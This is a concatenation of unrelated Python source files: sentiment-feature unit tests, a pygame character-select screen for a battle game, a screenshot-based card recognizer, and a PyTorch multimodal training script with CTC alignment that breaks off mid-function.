sum_of_negative_verbs_and_bigrams_with_verbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS, positive=False)
nose.tools.assert_almost_equal(
expected_sum, sum_of_negative_verbs_and_bigrams_with_verbs)
def test_sum_ratio_of_positive_adjectives_scores_and_bigrams_with_adjectives():
expected_sum = 0.0855961827957 / 186
sum_of_positive_adjectives_and_bigrams_with_adjectives = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, ratio=True)
nose.tools.assert_almost_equal(
expected_sum, sum_of_positive_adjectives_and_bigrams_with_adjectives)
def test_sum_ratio_of_negative_adjectives_scores_and_bigrams_with_adjectives():
expected_sum = -0.006981715724808572
sum_of_negative_adjectives_and_bigrams_with_adjectives = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1a, positive=False, ratio=True)
nose.tools.assert_almost_equal(
expected_sum, sum_of_negative_adjectives_and_bigrams_with_adjectives)
def test_sum_ratio_of_positive_adverbs_scores_and_bigrams_with_adverbs():
expected_sum = 0.0
sum_of_positive_adverbs_and_bigrams_with_adverbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS, ratio=True)
nose.tools.assert_almost_equal(
expected_sum, sum_of_positive_adverbs_and_bigrams_with_adverbs)
def test_sum_ratio_of_negative_adverbs_scores_and_bigrams_with_adverbs():
expected_sum = -0.00891862928349 / 321
sum_of_negative_adverbs_and_bigrams_with_adverbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS, positive=False, ratio=True)
nose.tools.assert_almost_equal(
expected_sum, sum_of_negative_adverbs_and_bigrams_with_adverbs)
def test_sum_ratio_of_positive_verbs_scores_and_bigrams_with_verbs():
expected_sum = 0.003806268354723089
sum_of_positive_verbs_and_bigrams_with_verbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS, ratio=True)
nose.tools.assert_almost_equal(
expected_sum, sum_of_positive_verbs_and_bigrams_with_verbs)
def test_sum_ratio_of_negative_verbs_scores_and_bigrams_with_verbs():
expected_sum = -0.0333350537634 / 186
sum_of_negative_verbs_and_bigrams_with_verbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS, positive=False, ratio=True)
nose.tools.assert_almost_equal(
expected_sum, sum_of_negative_verbs_and_bigrams_with_verbs)
def test_positive_to_negative_ratio_sum_scores_adjectives_and_bigrams_with_adjectives():
expected_ratio_sum = 0.0855961827957 - 0.165738387097
positive_to_negative_ratio_sum = sum_features.positive_to_negative_ratio_sum_unigrams_and_bigrams_scores(
bow_sentences_1)
nose.tools.assert_almost_equal(
expected_ratio_sum, positive_to_negative_ratio_sum)
def test_positive_to_negative_ratio_sum_scores_adverbs_and_bigrams_with_adverbs():
expected_ratio_sum = 0.0
positive_to_negative_ratio_sum = sum_features.positive_to_negative_ratio_sum_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS)
nose.tools.assert_almost_equal(
expected_ratio_sum, positive_to_negative_ratio_sum)
def test_positive_to_negative_ratio_sum_scores_verbs_and_bigrams_with_verbs():
expected_ratio_sum = 0.6746308602150538
positive_to_negative_ratio_sum = sum_features.positive_to_negative_ratio_sum_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS)
nose.tools.assert_almost_equal(
expected_ratio_sum, positive_to_negative_ratio_sum)
""" ----------------------------- COUNT FEATURES ----------------------------- """
"""UNIGRAMS"""
def test_positive_scores_adjectives_count():
expected_count = count_features.count_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADJS, positive=True)
assert expected_count == 16
def test_negative_scores_adjectives_count():
expected_count = count_features.count_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADJS, positive=False)
assert expected_count == 4
def test_positive_scores_adverbs_count():
expected_count = count_features.count_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, positive=True)
assert expected_count == 1
def test_negative_scores_adverbs_count():
expected_count = count_features.count_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, positive=False)
assert expected_count == 2
def test_positive_scores_verbs_count():
expected_count = count_features.count_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS, positive=True)
assert expected_count == 5
def test_negative_scores_verbs_count():
expected_count = count_features.count_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS, positive=False)
assert expected_count == 0
def test_positive_to_negative_scores_ratio_of_adjectives_count():
expected_count = count_features.positive_to_negative_ratio_count_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADJS)
assert expected_count == (16 - 4)
def test_positive_to_negative_scores_ratio_of_adverbs_count():
expected_count = count_features.positive_to_negative_ratio_count_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS)
assert expected_count == (1 - 2)
def test_positive_to_negative_scores_ratio_of_verbs_count():
expected_count = count_features.positive_to_negative_ratio_count_unigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS)
assert expected_count == (5 - 0)
"""BIGRAMS"""
def test_positive_scores_adjectives_count_and_bigrams_with_adjectives():
expected_count = count_features.count_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADJS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADJS, positive=True)
assert expected_count == (16 + 1)
def test_negative_scores_adjectives_count_and_bigrams_with_adjectives():
expected_count = count_features.count_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADJS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADJS, positive=False)
assert expected_count == (4 + 3)
def test_positive_scores_adverbs_count_and_bigrams_with_adverbs():
expected_count = count_features.count_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS, positive=True)
assert expected_count == (1 + 0)
def test_negative_scores_adverbs_count_and_bigrams_with_adverbs():
expected_count = count_features.count_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS, positive=False)
assert expected_count == (2 + 0)
def test_positive_scores_verbs_count_and_bigrams_with_verbs():
expected_count = count_features.count_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS, positive=True)
assert expected_count == (5 + 1)
def test_negative_scores_verbs_count_and_bigrams_with_verbs():
expected_count = count_features.count_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS, positive=False)
assert expected_count == (0 + 0)
def test_positive_to_negative_scores_ratio_of_adjectives_count_and_bigrams_with_adjectives():
expected_count = count_features.positive_to_negative_ratio_count_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADJS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADJS)
assert expected_count == (16 + 1) - (4 + 3)
def test_positive_to_negative_scores_ratio_of_adverbs_count_and_bigrams_with_adverbs():
expected_count = count_features.positive_to_negative_ratio_count_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS)
assert expected_count == (1 + 0) - (2 + 0)
def test_positive_to_negative_scores_ratio_of_verbs_count_and_bigrams_with_verbs():
expected_count = count_features.positive_to_negative_ratio_count_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS)
assert expected_count == (5 + 1) - (0 + 0)
def test_count_selected_ngrams():
assert count_features.count_selected_ngrams(bow_sentences_1) == 17
assert count_features.count_selected_ngrams(bow_sentences_1a) == 33
assert count_features.count_selected_ngrams(bow_sentences_2a) == 13
""" ----------------------------- MAX FEATURES ----------------------------- """
"""UNIGRAMS"""
def test_max_rule_score_for_adjective():
assert max_features.max_rule_score_for_unigrams(
bow_sentences_1a, unigram=count_features.ADJS)['sign'] == 0
def test_max_rule_score_for_adverbs():
assert max_features.max_rule_score_for_unigrams(
bow_sentences_1a, unigram=count_features.ADVS)['sign'] == 1
def test_max_rule_score_for_verbs():
assert max_features.max_rule_score_for_unigrams(
bow_sentences_1a, unigram=count_features.VERBS)['sign'] == 1
"""BIGRAMS"""
def test_max_rule_score_for_adjective_and_bigrams_with_adjectives():
assert max_features.max_rule_score_for_unigrams_and_bigrams(bow_sentences_1a, unigram=count_features.ADJS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADJS) == 0
def test_max_rule_score_for_adverbs_and_bigrams_with_adverbs():
assert max_features.max_rule_score_for_unigrams_and_bigrams(bow_sentences_1a, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS) == 1
def test_max_rule_score_for_verbs_and_bigrams_with_verbs():
assert max_features.max_rule_score_for_unigrams_and_bigrams(bow_sentences_1a, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS) == 1
""" ----------------------------- PERCENTAGE FEATURES ----------------------------- """
def test_percentage_of_negated_ngrams_by_document_size():
nose.tools.assert_almost_equal(0.00537634408602, count_features.percentage_of_negated_ngrams_by_document_size(bow_sentences_1)['value'])
nose.tools.assert_almost_equal(0.0155763239875, count_features.percentage_of_negated_ngrams_by_document_size(bow_sentences_1a)['value'])
nose.tools.assert_almost_equal(0.0127388535032, count_features.percentage_of_negated_ngrams_by_document_size(bow_sentences_2a)['value'])
""" ----------------------------- MODULE TESTS ----------------------------- """
def test_all_count_features():
features_list = count_features.all(bow_sentences_1)
attributes = []
data = []
for fl in features_list:
attributes.append((fl['name'], 'REAL'))
data.append(fl['value'])
bow_sentences_1_dict = {'attributes': attributes, 'data': data}
# print bow_sentences_1_dict['attributes']
# print '------------------------------------------'
# print bow_sentences_1_dict['data']
assert len(bow_sentences_1_dict['attributes']) == len(bow_sentences_1_dict['data']) == 27
def test_all_sum_features():
features_list = sum_features.all(bow_sentences_1)
attributes = []
data = []
for fl in features_list:
attributes.append((fl['name'], 'REAL'))
data.append(fl['value'])
bow_sentences_1_dict = {'attributes': attributes, 'data': data}
# print bow_sentences_1_dict['attributes']
# print '------------------------------------------'
# print bow_sentences_1_dict['data']
assert len(bow_sentences_1_dict['attributes']) == len(bow_sentences_1_dict['data']) == 40
def test_all_max_features():
features_list = max_features.all(bow_sentences_1)
attributes = []
data = []
for fl in features_list:
attributes.append((fl['name'], 'REAL'))
data.append(fl['value'])
bow_sentences_1_dict = {'attributes': attributes, 'data': data}
# print bow_sentences_1_dict['attributes']
# print '------------------------------------------'
# print bow_sentences_1_dict['data']
assert len(bow_sentences_1_dict['attributes']) == len(bow_sentences_1_dict['data']) == 8
|
"""
This is used for Versus game againts the computer with all characters.
"""
import os
import pygame
from battle import Battle
from colors import *
class Versus(object):
    """
    Versus (player vs. computer) battle mode with all unlocked characters.

    Shows a character-select screen: left-click assigns a character to the
    warriors side, right-click to the enemies side, clicking a chosen
    character returns it to the pool. RETURN starts a Battle, ESCAPE exits
    (restoring the player's original skills).
    """
    def __init__(self, game):
        # Show the loading screen while everything below is prepared
        with game.load():
            self.game = game
            self.window = self.game.window
            self.characters = []
            self.warriors = []
            self.enemies = []
            self.warrior_images = []
            self.enemy_images = []
            # Load player and add it to characters
            self.game.set_game(True)
            self.characters.append(self.game.player)
            # Original player skills: the skills that were loaded from the
            # last save (not all skills, just the ones in use); kept so they
            # can be restored when the player leaves this mode.
            self.original_player_skills = dict(self.game.player.skills)
            # Load all other unlocked characters
            self.unlocked_characters = self.get_unlocked_characters()
            self.get_npcs_from_files()
            # Images and texts
            self.title = self.game.display_text("Curse of Tenebrae", SILVER)
            self.battle_bg = pygame.image.load("images/vsbackground.png").convert()
            self.frame = pygame.image.load("images/vsframe.png").convert_alpha()
            self.warriors_text = self.game.display_text("Warriors", SILVER)
            self.enemies_text = self.game.display_text("Enemies", SILVER)
            # TODO: dedicated character-select background image
            self.new_char_img_width = 100
            self.new_char_img_height = 115
            # Error messages shown when starting a battle with empty sides
            self.no_chosed_warriors = self.game.display_text(
                "You need to at least choose 1 warrior.",
                FIREBRICK
            )
            self.no_chosed_enemies = self.game.display_text(
                "You need to at least choose 1 enemy.",
                FIREBRICK
            )
            # Start
            self.characters_select()
    def get_unlocked_characters(self):
        """
        Gets the names of unlocked characters
        and return a list with their names.
        """
        characters = []
        with open("story/unlockedchars.txt") as fl:
            for line in fl:
                characters.append(line.strip())
        return characters
    def get_npcs_from_files(self):
        """
        Creates the characters that are part of the
        unlocked_characters list.
        """
        npcs_filepath = "maps"
        npc_files = []
        # Only per-map NPC definition files ("...npcs....txt")
        for fl in os.listdir(npcs_filepath):
            if "npcs" in fl and ".txt" == os.path.splitext(fl)[1]:
                npc_files.append(fl)
        for npcfl in npc_files:
            with open(os.path.join(npcs_filepath, npcfl)) as nfl:
                npcs = nfl.readlines()
            for npcline in npcs:
                npc = self.game.make_npc(npcline)
                if npc is not None and npc.name in self.unlocked_characters:
                    self.characters.append(npc)
    def get_rects_and_images(self):
        """
        Returns tuple of two lists, first one contains all new character images,
        and the second one all rects of those images.
        """
        character_images = []
        character_rects = []
        shift_x = 25
        shift_y = self.game.WINDOW_HEIGHT/2
        chars_per_row = 8
        chars_rowcount = 0
        shift_x_by = 100
        shift_y_by = 120
        for char in self.characters:
            # Set new smaller image
            newimg = pygame.transform.scale(char.warrior_image,
                                            [self.new_char_img_width, self.new_char_img_height])
            character_images.append(newimg)
            # Set rect for that image
            newimg_rect = self.game.set_rect(newimg, shift_x, shift_y)
            character_rects.append(newimg_rect)
            shift_x += shift_x_by
            # Wrap to the next row once a row is full
            # NOTE(review): rows after the first restart at x=50, not the
            # initial 25 — confirm whether this offset is intentional.
            if chars_rowcount == chars_per_row:
                shift_x = 50
                shift_y += shift_y_by
                chars_rowcount = 0
            chars_rowcount += 1
        return character_images, character_rects
    def clear(self):
        """
        It clears the chosed warriors and chosed enemies after the game.
        """
        # Change images back to where they were
        self.change_image_direction()
        # Iterate over a fresh concatenated list so removing from the
        # underlying lists is safe.
        for char in self.warriors + self.enemies:
            if char in self.warriors:
                self.warriors.remove(char)
                self.warrior_images = []
            elif char in self.enemies:
                self.enemies.remove(char)
                self.enemy_images = []
            self.characters.append(char)
    def change_image_direction(self):
        """
        Flips horizontally warrior images since all images face to the right,
        we need the warriors to face toward the left.
        """
        # FIX: dropped an unused accumulator list that was never read.
        for warrior in self.warriors:
            newimg = pygame.transform.flip(warrior.warrior_image, True, False)
            warrior.warrior_image = newimg
    def set_chosed_chars_rects(self, charscount, shift_x, shift_y, shift_x_by):
        """
        Returns a list with new rectangular points for the chosed warriors or enemies.
        """
        new_rects = []
        for _ in range(charscount):
            rect = pygame.Rect(shift_x, shift_y,
                               self.new_char_img_width, self.new_char_img_height)
            shift_x += shift_x_by
            new_rects.append(rect)
        return new_rects
    def characters_select(self):
        """
        Displays the screen in which character select happens.
        """
        errors = False
        error = None
        while True:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    self.game.quit_game()
                if event.type == pygame.KEYDOWN:
                    if event.key == pygame.K_l:
                        self.game.show_skills()
                    if event.key == pygame.K_ESCAPE:
                        # Restore the skills the player entered this mode with
                        self.game.player.skills = dict(self.original_player_skills)
                        return True
                    if event.key == pygame.K_RETURN:
                        if len(self.warriors) == 0:
                            errors = True
                            error = self.no_chosed_warriors
                        elif len(self.enemies) == 0:
                            errors = True
                            error = self.no_chosed_enemies
                        else:
                            # Flip warrior images
                            self.change_image_direction()
                            # Start battle
                            battle = Battle(self.game,
                                            self.warriors,
                                            self.enemies)
                            battle.start_battle()
                            # Clear warriors and enemies
                            self.clear()
            # Get character image and rects
            self.character_images, self.character_rects = self.get_rects_and_images()
            # Display bg and title
            self.window.blit(self.battle_bg, [0, 0])
            self.window.blit(self.title, [self.game.center_text_x(self.title), 50])
            # Draw unlocked characters
            for char, charimg, imgrect in zip(self.characters, self.character_images, self.character_rects):
                self.window.blit(charimg,
                                 [imgrect.x, imgrect.y])
                # Check if clicked character; clicked_surface_rect returns a
                # non-iterable when nothing was clicked, hence the TypeError.
                # FIX: removed a leftover Python 2 debug print of pressed_btn.
                try:
                    clicked_char, pressed_btn = self.game.clicked_surface_rect(imgrect, True, True)
                except TypeError:
                    clicked_char = False
                    pressed_btn = None
                # Add clicked to warriors (left button) or enemies (right
                # button), each side capped at 3 characters
                if clicked_char and pressed_btn[0] and len(self.warriors) < 3:
                    self.characters.remove(char)
                    self.warriors.append(char)
                    self.warrior_images.append(charimg)
                elif clicked_char and pressed_btn[2] and len(self.enemies) < 3:
                    self.characters.remove(char)
                    self.enemies.append(char)
                    self.enemy_images.append(charimg)
            # Draw enemies
            self.window.blit(self.enemies_text,
                             [self.game.WINDOW_WIDTH/1.3,
                              self.game.WINDOW_HEIGHT/5])
            enemy_rects = self.set_chosed_chars_rects(
                len(self.enemies),
                self.game.WINDOW_WIDTH/1.7,
                self.game.WINDOW_HEIGHT/4,
                100)
            for enemy, enemyimg, enemyrect in zip(self.enemies,
                                                  self.enemy_images,
                                                  enemy_rects):
                self.window.blit(enemyimg, [enemyrect.x, enemyrect.y])
                clicked_enemy = self.game.clicked_surface_rect(enemyrect)
                if clicked_enemy:
                    # Remove from enemies and add to all characters
                    self.enemies.remove(enemy)
                    self.enemy_images.remove(enemyimg)
                    self.characters.append(enemy)
            # Draw warriors
            self.window.blit(self.warriors_text,
                             [self.game.WINDOW_WIDTH/6,
                              self.game.WINDOW_HEIGHT/5])
            warrior_rects = self.set_chosed_chars_rects(
                len(self.warriors),
                20,
                self.game.WINDOW_HEIGHT/4,
                100)
            for warrior, warriorimg, warriorect in zip(self.warriors,
                                                       self.warrior_images,
                                                       warrior_rects):
                self.window.blit(warriorimg, [warriorect.x, warriorect.y])
                clicked_warrior = self.game.clicked_surface_rect(warriorect)
                if clicked_warrior:
                    # Remove from warriors and add to all characters
                    self.warriors.remove(warrior)
                    self.warrior_images.remove(warriorimg)
                    self.characters.append(warrior)
            # Draw errors if any
            if errors:
                self.window.blit(error,
                                 [20, self.game.WINDOW_HEIGHT/1.1])
            # Update everything and set clock
            pygame.display.update()
            self.game.clock.tick(self.game.FPS)
|
from Board import Board
from Board import Card
import numpy as np
from PIL import Image, ImageGrab
class ScreenParser:
    """
    Screen Parser

    Captures a screenshot of the game window and converts fixed screen
    regions into a Board (tableau piles plus foundation). All pixel
    coordinates below assume a specific window position and resolution —
    TODO confirm against the target setup. (Python 2 module: uses xrange.)
    """
    def __init__(self):
        self.recognizer = CardRecognizer()
        # PIL image of the screenshot currently being parsed
        self.origin = None
    def capture_screenshot(self, im_path='screenshot.png'):
        """Grab the full screen and save it to im_path."""
        im = ImageGrab.grab()
        im.save(im_path)
    def parse_screenshot(self, im_path='screenshot.png'):
        """
        Input a screenshot and return with Board
        """
        self.origin = Image.open(im_path).convert('RGB')
        tableau = self.__split_tableau_area__()
        foundation = self.__split_foundation_area__()
        board = Board(tableau = tableau)
        # Replay the recognized foundation cards onto the board.
        # NOTE(review): assumes Card has .number and .color attributes and
        # that addToFoundation takes a color — confirm against Board/Card.
        for card in foundation:
            for i in range(card.number):
                board.foundation.addToFoundation(card.color)
        return board
    def __split_tableau_area__(self):
        """Scan the 8 tableau columns, up to 5 card slots each, by cropping
        a fixed 14x14 pixel patch per slot and recognizing it."""
        # top-left patch of the first tableau slot
        (left, upper, right, lower) = (173, 310, 187, 324)
        # (ds, rs): vertical step between stacked cards, horizontal step
        # between columns, in pixels
        (ds, rs) = (31, 152)
        tableau = [[] for i in range(8)]
        for i in xrange(8):
            for j in xrange(5):
                box = (left+rs*i, upper+ds*j, right+rs*i, lower+ds*j)
                reg = self.origin.crop(box)
                card = self.recognizer.recognize_card(reg)
                if card:
                    tableau[i].append(card)
                else:
                    # first unrecognized slot ends the column
                    break
        return tableau
    def __split_foundation_area__(self):
        """Scan the 3 foundation piles; for each, probe upward one pixel at
        a time until the recognized card's number matches the probe depth."""
        (left, upper, right, lower) = (933, 46, 947, 60)
        # horizontal step between foundation piles, in pixels
        rs = 152
        foundation = []
        for i in xrange(3):
            for j in xrange(9):
                box = (left+rs*i, upper-j, right+rs*i, lower-j)
                reg = self.origin.crop(box)
                card = self.recognizer.recognize_card(reg)
                # NOTE(review): matching card.number == j+1 presumably ties
                # the pile's pixel offset to the top card's rank — confirm.
                if card and card.number == j+1:
                    foundation.append(card)
                    break
        return foundation
class CardRecognizer:
    """
    Card Recognizer

    Matches a small cropped card image against a precomputed binary
    template model ('card_type.npy') to get the card type, then classifies
    its color from raw pixel values.
    """
    def __init__(self):
        # Precomputed per-type boolean pixel masks; one row per card type.
        self.type_model = np.load('card_type.npy')
    def recognize_card(self, im):
        """
        recognize a card with its image

        Returns a Card, or None when no template matches.
        NOTE(review): types < 10 appear to be numbered cards (color + number)
        and types >= 10 special cards built as Card(typ-7, None) — confirm
        against the Card constructor's parameter meaning.
        """
        src = np.array(list(im.getdata()))
        typ = self.__recognize_card_type__(src)
        if typ and typ < 10:
            color = self.__recognize_card_color__(src)
            return Card(color, typ)
        elif typ:
            return Card(typ-7, None)
        else:
            return None
    def __recognize_card_type__(self, src):
        """Return the 1-based index of the first template within the
        Hamming-distance threshold, or None if nothing matches."""
        # maximum number of differing mask pixels tolerated (empirical)
        threshold = 28
        # Binarize: True where any channel differs from the first pixel by > 8.
        test = ((src[0]-src)>8).any(1)
        for i in xrange(13):
            if np.sum(np.logical_xor(self.type_model[i], test)) < threshold:
                return i+1
        return None
    def __recognize_card_color__(self, src):
        """Classify the card's color from channel differences against a
        reference background color (193, 195, 179). Thresholds are empirical."""
        (r_threshold, g_threshold, threshold) = (80, 50, 30)
        dif = src - np.array([193, 195, 179])
        # Enough pixels markedly stronger in red than green -> red, etc.
        if np.sum(dif[:,0]<(dif[:,1]-r_threshold)) > threshold:
            return 1 # red
        if np.sum(dif[:,1]<(dif[:,0]-g_threshold)) > threshold:
            return 0 # green
        return 2 # black
|
import torch
from torch import nn
import sys
from src import models
from src import ctc
from src.utils import *
import torch.optim as optim
import numpy as np
import time
from torch.optim.lr_scheduler import ReduceLROnPlateau
import os
import pickle
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import precision_recall_fscore_support
from sklearn.metrics import accuracy_score, f1_score
from src.eval_metrics import *
####################################################################
#
# Construct the model and the CTC module (which may not be needed)
#
####################################################################
def get_CTC_module(hyp_params):
    """Build the audio->text and vision->text CTC alignment modules."""
    ctc_cls = getattr(ctc, 'CTCModule')
    audio_to_text = ctc_cls(in_dim=hyp_params.orig_d_a, out_seq_len=hyp_params.l_len)
    vision_to_text = ctc_cls(in_dim=hyp_params.orig_d_v, out_seq_len=hyp_params.l_len)
    return audio_to_text, vision_to_text
def initiate(hyp_params, train_loader, valid_loader, test_loader):
    # Build the model, optimizer, loss criterion and (when the data is
    # unaligned and the model is not MULT) the CTC alignment modules, then
    # hand everything to train_model which runs the full training loop.
    model = getattr(models, hyp_params.model+'Model')(hyp_params)  # resolve model class by name from src.models
    if hyp_params.use_cuda:
        model = model.cuda()
    optimizer = getattr(optim, hyp_params.optim)(model.parameters(), lr=hyp_params.lr)  # optimizer class resolved by name from torch.optim
    criterion = getattr(nn, hyp_params.criterion)()  # loss class resolved by name from torch.nn
    if hyp_params.aligned or hyp_params.model=='MULT':
        # Aligned data (or the MULT model) needs no CTC alignment machinery.
        ctc_criterion = None
        ctc_a2l_module, ctc_v2l_module = None, None
        ctc_a2l_optimizer, ctc_v2l_optimizer = None, None
    else:
        # Unaligned data: learn audio->text and vision->text alignments via CTC.
        # Imported lazily so the dependency is only required in this mode.
        from warpctc_pytorch import CTCLoss
        ctc_criterion = CTCLoss()
        ctc_a2l_module, ctc_v2l_module = get_CTC_module(hyp_params)
        if hyp_params.use_cuda:
            ctc_a2l_module, ctc_v2l_module = ctc_a2l_module.cuda(), ctc_v2l_module.cuda()
        ctc_a2l_optimizer = getattr(optim, hyp_params.optim)(ctc_a2l_module.parameters(), lr=hyp_params.lr)
        ctc_v2l_optimizer = getattr(optim, hyp_params.optim)(ctc_v2l_module.parameters(), lr=hyp_params.lr)
    # Reduce LR by 10x when validation loss plateaus for `when` epochs.
    scheduler = ReduceLROnPlateau(optimizer, mode='min', patience=hyp_params.when, factor=0.1, verbose=True)
    settings = {'model': model,
                'optimizer': optimizer,
                'criterion': criterion,
                'ctc_a2l_module': ctc_a2l_module,
                'ctc_v2l_module': ctc_v2l_module,
                'ctc_a2l_optimizer': ctc_a2l_optimizer,
                'ctc_v2l_optimizer': ctc_v2l_optimizer,
                'ctc_criterion': ctc_criterion,
                'scheduler': scheduler}
    return train_model(settings, hyp_params, train_loader, valid_loader, test_loader)
####################################################################
#
# Training and evaluation scripts
#
####################################################################
def train_model(settings, hyp_params, train_loader, valid_loader, test_loader):
    # Full training/evaluation driver: trains for num_epochs, checkpoints on
    # validation improvement, then reloads the best model and reports the
    # dataset-specific final metrics.
    # Unpack everything prepared by initiate(); the ctc_* entries are None
    # when the data is aligned or the model is MULT.
    model = settings['model']
    optimizer = settings['optimizer']
    criterion = settings['criterion']
    ctc_a2l_module = settings['ctc_a2l_module']
    ctc_v2l_module = settings['ctc_v2l_module']
    ctc_a2l_optimizer = settings['ctc_a2l_optimizer']
    ctc_v2l_optimizer = settings['ctc_v2l_optimizer']
    ctc_criterion = settings['ctc_criterion']
    scheduler = settings['scheduler']
    def train(model, optimizer, criterion, ctc_a2l_module, ctc_v2l_module, ctc_a2l_optimizer, ctc_v2l_optimizer, ctc_criterion):
        # One pass over train_loader; returns the mean combined loss per sample.
        # NOTE: reads `epoch` from the enclosing loop below for its log line.
        epoch_loss = 0
        model.train()
        num_batches = hyp_params.n_train // hyp_params.batch_size
        proc_loss, proc_size = 0, 0
        start_time = time.time()
        for i_batch, (batch_X, batch_Y, batch_META) in enumerate(train_loader):
            sample_ind, text, audio, vision = batch_X
            eval_attr = batch_Y.squeeze(-1)   # if num of labels is 1
            model.zero_grad()
            if ctc_criterion is not None:
                ctc_a2l_module.zero_grad()
                ctc_v2l_module.zero_grad()
            if hyp_params.use_cuda:
                with torch.cuda.device(0):
                    text, audio, vision, eval_attr = text.cuda(), audio.cuda(), vision.cuda(), eval_attr.cuda()
                    if hyp_params.dataset == 'iemocap':
                        # IEMOCAP labels are class indices -> long for CrossEntropy-style losses.
                        eval_attr = eval_attr.long()
            batch_size = text.size(0)
            batch_chunk = hyp_params.batch_chunk
            ######## CTC STARTS ######## Do not worry about this if not working on CTC
            if ctc_criterion is not None:
                # DataParallel only pays off for non-trivial batch sizes.
                ctc_a2l_net = nn.DataParallel(ctc_a2l_module) if batch_size > 10 else ctc_a2l_module
                ctc_v2l_net = nn.DataParallel(ctc_v2l_module) if batch_size > 10 else ctc_v2l_module
                audio, a2l_position = ctc_a2l_net(audio) # audio now is the aligned to text
                vision, v2l_position = ctc_v2l_net(vision)
                ## Compute the ctc loss
                l_len, a_len, v_len = hyp_params.l_len, hyp_params.a_len, hyp_params.v_len
                # Output Labels
                l_position = torch.tensor([i+1 for i in range(l_len)]*batch_size).int().cpu()
                # Specifying each output length
                l_length = torch.tensor([l_len]*batch_size).int().cpu()
                # Specifying each input length
                a_length = torch.tensor([a_len]*batch_size).int().cpu()
                v_length = torch.tensor([v_len]*batch_size).int().cpu()
                ctc_a2l_loss = ctc_criterion(a2l_position.transpose(0,1).cpu(), l_position, a_length, l_length)
                ctc_v2l_loss = ctc_criterion(v2l_position.transpose(0,1).cpu(), l_position, v_length, l_length)
                ctc_loss = ctc_a2l_loss + ctc_v2l_loss
                ctc_loss = ctc_loss.cuda() if hyp_params.use_cuda else ctc_loss
            else:
                ctc_loss = 0
            ######## CTC ENDS ########
            combined_loss = 0
            net = nn.DataParallel(model) if batch_size > 10 else model
            if batch_chunk > 1:
                # Gradient accumulation: process the batch in smaller chunks to fit memory.
                raw_loss = combined_loss = 0
                text_chunks = text.chunk(batch_chunk, dim=0)
                audio_chunks = audio.chunk(batch_chunk, dim=0)
                vision_chunks = vision.chunk(batch_chunk, dim=0)
                eval_attr_chunks = eval_attr.chunk(batch_chunk, dim=0)
                for i in range(batch_chunk):
                    text_i, audio_i, vision_i = text_chunks[i], audio_chunks[i], vision_chunks[i]
                    eval_attr_i = eval_attr_chunks[i]
                    preds_i, hiddens_i = net(text_i, audio_i, vision_i)
                    if hyp_params.dataset == 'iemocap':
                        preds_i = preds_i.view(-1, 2)
                        eval_attr_i = eval_attr_i.view(-1)
                    raw_loss_i = criterion(preds_i, eval_attr_i) / batch_chunk
                    raw_loss += raw_loss_i
                    raw_loss_i.backward()
                # NOTE(review): when ctc_criterion is None, ctc_loss is the int 0 and
                # this .backward() would raise AttributeError — looks like batch_chunk > 1
                # is only expected together with CTC; confirm.
                ctc_loss.backward()
                combined_loss = raw_loss + ctc_loss
            else:
                preds, hiddens = net(text, audio, vision)
                if hyp_params.dataset == 'iemocap':
                    preds = preds.view(-1, 2)
                    eval_attr = eval_attr.view(-1)
                raw_loss = criterion(preds, eval_attr)
                combined_loss = raw_loss + ctc_loss
                combined_loss.backward()
            if ctc_criterion is not None:
